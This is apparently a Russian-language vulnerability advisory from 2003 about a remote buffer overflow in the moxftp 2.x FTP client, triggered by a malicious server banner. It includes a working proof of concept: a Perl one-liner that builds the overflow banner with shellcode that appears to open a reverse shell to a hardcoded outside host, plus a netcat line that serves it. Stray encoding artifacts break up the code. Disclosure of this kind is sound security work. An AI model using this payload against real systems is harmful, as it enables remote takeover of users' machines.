Переполнение буфера в Moxftp

Дата публикации:
27.02.2003
Всего просмотров:
592
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
moxftp 2.x
Описание: Переполнение буфера обнаружено в moxftp FTP клиенте. Удаленный FTP сервер может выполнить произвольный код на системе клиента, который подключен к злонамеренному FTP серверу.

Как сообщается, удаленный сервер может представить специально обработанный '220' баннер клиенту, чтобы вызвать переполнение буфера. Согласно сообщению, формат баннера должен выглядеть следующим образом:

 
[508 bytes][ebp ][eip ][nops][shellcode]
Уязвимость обнаружена в Moxftp 2.2

Пример:

$ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "
\x90" =
x 100 . =
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9=
\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\=
x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x=
2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80" =
. "\n"' > file
# nc -l -p 21 < file


Ссылки: moxftp arbitrary code execution poc/advisory
или введите имя

CAPTCHA